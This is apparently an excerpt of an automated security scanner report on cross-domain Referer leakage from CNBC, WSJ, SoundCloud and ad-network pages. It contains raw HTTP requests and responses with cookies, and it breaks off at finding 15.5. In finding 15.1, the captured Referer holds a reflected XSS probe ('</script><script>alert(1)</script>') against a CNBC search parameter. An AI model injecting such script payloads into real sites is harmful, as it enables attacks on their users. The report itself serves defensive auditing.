http://a.tribalfusion.com/j.ad
http://a1.sndcdn.com/javascripts/base.js
http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub
http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow
http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5
http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/news_us
http://ad.doubleclick.net/adj/nbcu.cnbc/news_us
http://ad.doubleclick.net/adj/nbcu.cnbc/news_us
http://ad.doubleclick.net/adj/nbcu.cnbc/search
http://admeld.adnxs.com/usersync
http://ads.bluelithium.com/st
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://cas.criteo.com/delivery/afr.php
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/tplclick
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm
http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm
http://fls.doubleclick.net/activityi
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_impression
http://ib.adnxs.com/ptj
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js
http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js
http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js
http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js
http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html
http://optimized-by.rubiconproject.com/a/dk.html
http://pbid.pro-market.net/engine
http://pixel.invitemedia.com/admeld_sync
http://pixel.invitemedia.com/admeld_sync
http://platform.twitter.com/widgets/follow_button.html
http://reviews.homedepot.com/1999q/202642971/reviews.htm
http://reviews.homedepot.com/1999s/202642971/reviews.htm
http://rs.gwallet.com/r1/pixel/x113
http://search.cnbc.com/main.do
https://services.wsj.com/Gryphon/jsp/retentionController.jsp
https://soundcloud.com/login
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/2939
http://ticker.cnbc.com/scripts/cnbc_ticker.js
http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/
http://www.cnbc.com/js/cnbc_quote_components.js
http://www.creditcards.com/oc/
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/recommendations.php
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate
http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay
http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js
http://www.nutter.com/attorneys.php

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. http://a.rfihub.com/sed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The page was loaded from a URL containing a query string:

http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608?
http://ad.doubleclick.net/adj/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608;click=http://a.rfihub.com/acs/127_1_YWE9MTk3ODksOTA0NjEsMTkzNzAsMTg2MjU0MSwxNTA0LDIzMjUyLFhWcktLcjNxQ3Q3NixwLDkwMSwzNzg4LDUxMjU5LDIzOTAsODY2MSZyYj00NDUmcmU9MTIzODcX
http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6=
http://b.scorecardresearch.com/p?c1=8&c2=6820648&c3=1&c4=&c5=&c6=&cj=1&rn=1308305514608
http://cm.g.doubleclick.net/pixel?nid=rfi&forward=
http://ib.adnxs.com/pxj?bidder=18&action=setuids('615022824147045895','1CAESEA0pzwV4-SdN2wuhHcO4rdI');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: g="aABgmj8uw==BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAGG0IReg==AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC7BDsnw==AE9479AN1294103956000AAABL-SS69A=AE8438AN1275963655000AAABL-SS69A="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABpVi0zA==AI89bBrQ==AAABL_5mTvg="; f="aAC9KJdew==AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: g="aADDdMBBg==BCaXVrKKr3qCt76|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V4HA=BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: u="aABrHtwfA==AI89bBrQ==AAABMJ0V4HA=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: c="aAMAMJ_Rg==AFd1504AB2AAABMJ0V4HA=AFv3788AB2AAABMJ0V4HA=AGu23252AB2AAABMJ0V4HA=AGt23252AB2AAABMJ0V4HA=AGb19789AB2AAABMJ0V4HA=AGa19789AB2AAABMJ0V4HA=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: f="aADF8vybA==AK1308305514AB2AAABMJ0V4HA=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: s="aAC0rUkZw==AE9479AN1294103956000AAABMJ0V4HA=AE8438AN1275963655000AAABMJ0V31c=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT
Content-Length: 1983

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608;click=http://a.rfihub.com/acs/127_1_YWE9MTk3ODksOTA0NjEsMTkzNzAsMTg2MjU0MSwxNTA0LDIzMjUyLFhWcktLcjNxQ3Q3NixwLDkwMSwzNzg4LDUxMjU5LDIzOTAsODY2MSZyYj00NDUmcmU9MTIzODcX">
</SCRIPT>
...[SNIP]...
Tg2MjU0MSwxNTA0LDIzMjUyLFhWcktLcjNxQ3Q3NixwLDkwMSwzNzg4LDUxMjU5LDIzOTAsODY2MSZyYj00NDUmcmU9MTIzODcXhttp://ad.doubleclick.net/jump/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608?">
<IMG SRC="http://ad.doubleclick.net/ad/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
</noscript><script src="http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6="></script>
<noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6820648&c3=1&c4=&c5=&c6=&cj=1&rn=1308305514608" /></noscript><img src="http://cm.g.doubleclick.net/pixel?nid=rfi&forward=" width="1" height="1" /><img src="http://ib.adnxs.com/pxj?bidder=18&action=setuids('615022824147045895','1CAESEA0pzwV4-SdN2wuhHcO4rdI');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D" width="1" height="1">
</body>
...[SNIP]...

15.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=cnbc&adSpace=ros&tagKey=2057624979&th=23714094314&tKey=undefined&size=300x250&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&f=1&p=18539281&a=1&rnd=18540847

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=2057624979&th=23714094314&tKey=undefined&size=300x250&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&f=1&p=18539281&a=1&rnd=18540847 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308238598325&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aenZcWCu4Y9gLeMZbSYA1xVpo7RlcZam2Zb5Zbkfn5Jc7LB1pBwQgcqGwnasnx0saaUyshmTZbmEW5IUdtpNIAi5FOZcvZbFGe43ZaNLFYWZboQqXaaMBpk3Tf7bdVGYh8ZcxdXguTxVxfkkv0EitX38Q2mVf8AoZdNLKhjMl7bpjRZcZdYZdMO75nHmgQ9WQbbYQcRYkVvNfHZbPaBYfJeV9DtlexoZappG6Ub3qSQDRetp1yhTevA0a3hYJAdMAZcCBgQlaoZdQwHK9IZaZb0GSjV4yoYdvgwxKEIQg88xUgx5dFsKZasAaIZdoXcVZdttjCKtaAZa0c5RCeB9F2O9SgSgTnJpCpM0hrTZa1546kVZdONZdMrTm3HlB5XIxd1UfCm79a9m28bhFCZbxZbSxQAZba76Urmg05gbSdoP7MEGZclUZblh1b3oVcExBQ4it1ZbZdXTu0fs7n82KWKcOvSgVoEirAMyb93yqEqS6kyWIIOm8V1pZbV2ZbAQibXdIysVMOoLPVOEqBwmSGU2GMwgM16Btrf27fWtiJqTkVNfWFNZbN4RindRo2AZbSBItFKBCvMfAINK12VnZaSIG6ZcRmVD4tynMHpgdxWUsOMn4Nbjo5ioRFBWZc84mHQ8Pt0EQqmR2ugJ73fOJOM0P6ZcMW2b3m7GB9pYRJqWYc8fQlA6lNoIVIpw0ZbfZcpkaZb2Hi0NoaPLFM

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=amnZcOBy4ZaZaIwaunpZbNXL8yoXeZbp96hTopuOkKDwFp5TflvlDqa12W6YFRqcQ9Za7bl3UfOFlsZaqRDK9J9YLAO1B0UeJRJiPyrX2C7rwFlPX2jQCd8kpdkSC60KGF1BCihZd2a2QYGO3Qv5AXI438ZbqddGZcN2DeV5wK2rFQMZblZdSIZa76ZdRWFC0GyMXurIE4uofk00jI7GMqKUZaNf0vclRfhZalB8TL94vXwIMYDHV55LmRZbLEVyFQYtStqgBX7lj12lLOq8DHWfnKTpPlQYSe7HZdgaZdmZdfZaYZc4UT6FNvOPAjLZcpNV8i9ef0w0AaZa7pGP0W0sTQtt1pW33t98Gyc9epxLlowYLXEDgMHm73fZb3hXF27RxlMtHCACdrteQZcPiMkZbnRrktiMV6akk3TWhrxVUXwrGcZbvOZan3cK3ZcMDDZchIwMVZdAgTeP4mFrT8JHZayJAcqJZcYeJmPpFg37bJRHmY38imDuCp9ZbBurcKCAOZbjnH7nVTZc801ZdFOcZdmRuU3hYO0PjqHX4GfGkxbF4MOfdZbIZbaZaC2iVGvrgXZdQSinXhSZaDRxuTAoXPFvpyNow263n3Fk9enRBFTXqbAOZcZb2fvQhAfZdnKl1qFnNuWkZc9OL7ZaCDY9ZdrXI8qpMZbMhLrNHJMhSfPUQG68CjgdjZc4N2hi0pLhC0wU4rXtFAJU7hlUM3Ua; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 15:36:37 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 267
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>
...[SNIP]...

15.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=cnbc&adSpace=ros&tagKey=2057624979&th=23714094314&tKey=undefined&size=728x90&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&f=1&p=17914015&a=1&rnd=17922559

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=2057624979&th=23714094314&tKey=undefined&size=728x90&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&f=1&p=17914015&a=1&rnd=17922559 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aMnZclFR3Y760JDq8M22KgeiMlPEOZc0uqv9730iM3lUZasFdZcKq3nSeAwW3kGiEBZbMeB1sXoL0f1wpFDB7iFn8hZd9NfebRppyuLbl2iXLpmXPEu6pVPvCVMBjZcE0pqiUXy0vB6228YHLgZd7rSc2uU8PP7Yk96oZcnAlPtnlZck4v7mZcy2Q0lZdpoLoaPoAZd2yogvoxsKTsofDFfeh2JLnR9K3wmeZd77HJPHGFZcf5WrPfDQxPrFtRQ0yEOURaxPQlXZdyppSUZddP5fiTWw2d3leI3l6gw5UmpEDpbfINOkZbccwfxoGyZc3N0cjIpZaM2LZaqESZdWilWZbSLt1wteHQwBeAZc6ChoYLO85V1s5ikoXXJdZbduyj1391ZcZcnQSqHhLeIYmIxaZdJGl3o9NZcqHM0xQ0eyDtMQZbHG9v0SbNMy7wCib0dT1x55OBo2XZaqR6NiwkMZa2Tjieu2ZdAFNsIbV2i4bQcNuyoauw5KujbvLFPmlleiww97EkL8DvYm62kZdIqwRpZaEKS9Bu8tV9h9y44iedqJxkObLMr8jfTSFSPCkno4FUZdU4X8TWoAOC2iQ1mH4pCYo3IOPiswWjZaP6QV1hwaryUuq4nXIc1qAcqLHkkM1Jc0BEysH79cxG7PZdjC22RIDOqRhtmIBK3BdAQb8K60Ba8tseE7vtDKwlqFhE8uIZa6Zcb9LUrN

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a8nZcOBw5Em7uuSSSik5fVfgehGZbSmKVALGRO429PZcOh5lxVTuPhF5l3F3P92Faw5M9ZbQsbeZcTyUupZcBOZdZcVHCYujZcdFXMAHKKZdvldhuGZdqY82bxSjgSiBlLKlSbpKWrdrMYnXU9kk3Rb49neNNlwHA3VN2Zb9iRk0CgCkaZbZabwShbJhaveAJ0vb8RYhSe8phCD52yxnMK24EiRECmZaViCOIPZbTgEt8NDIrl3S2ipUjsXVD8N9vjkNZdFGliLhWnCCkkr4TQLSNbvZdJvdwkPqxY1njyoaU40UZdLpMPBEvgZdpCA0d4I0B86LuDljH5E9L8pHATgoN1wNUHZctoIYg95ntmWGxXP655jv8ZaaBTluZc5lZbHZbxCxYF9CyxiROs1woXlySWcKVwZaqg84D87dGehar3eKH1laZcKDwZdTromA81a8oysD5SLugNNvQnTT6CJmkZbkxXBvZaPmX63BZbrA56XC4hOVDXfGBQPA7ZcJXJZd2PMfA8ZdVKxTmKJEVAWOUs8uZdJApZbBUqX6Yqif7SA3w9GFKVaHlQoT6oNqhB5ZbmsZdto2tBJIjFZdSF9EYCDrHLZdp7Q2QmdMs4sjl0CGpVpe7RrMS0Zap5ECpQDVEcksCUT0IcRRwwGIH1c4UdI8AlCcJ1ZcKZdNvMUQ7sZbPurkk87CrmbwZcCgjhe5ooQZasfna6wdkp; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 15:26:17 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 264
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>
...[SNIP]...

15.4. http://a1.sndcdn.com/javascripts/base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.sndcdn.com
Path:	/javascripts/base.js

Issue detail

The page was loaded from a URL containing a query string:

http://a1.sndcdn.com/javascripts/base.js?97dbe1c

The response contains the following links to other domains:

http://firefox.com/
http://get.adobe.com/flashplayer/
http://windowsupdate.microsoft.com/
http://www.apple.com/safari/
http://www.opera.com/download

Request

GET /javascripts/base.js?97dbe1c HTTP/1.1
Host: a1.sndcdn.com
Proxy-Connection: keep-alive
Referer: http://soundcloud.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
X-Cacheable: YES
Content-Length: 598782
X-Varnish: 2237982534 2237972266
Vary: Accept-Encoding
Cache-Control: max-age=315327688
Expires: Sun, 13 Jun 2021 10:29:05 GMT
Date: Thu, 16 Jun 2011 19:27:37 GMT
Connection: close

(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context);},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]*
...[SNIP]...
<div id="browser-warning"">Hey, SoundCloud currently works best in <a href="http://firefox.com">Firefox 3+</a>, <a href="http://www.apple.com/safari/">Safari 3+</a>, <a href="http://www.opera.com/download">Opera 9.5+</a> and <a href="http://windowsupdate.microsoft.com">Internet Explorer 7+</a>
...[SNIP]...
</div>').html("Hey, it seems your browser can't play SoundCloud audio streams. If you can, please take a moment to upgrade your browser or <a href='http://get.adobe.com/flashplayer/'>Flash Player plugin</a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

Issue detail

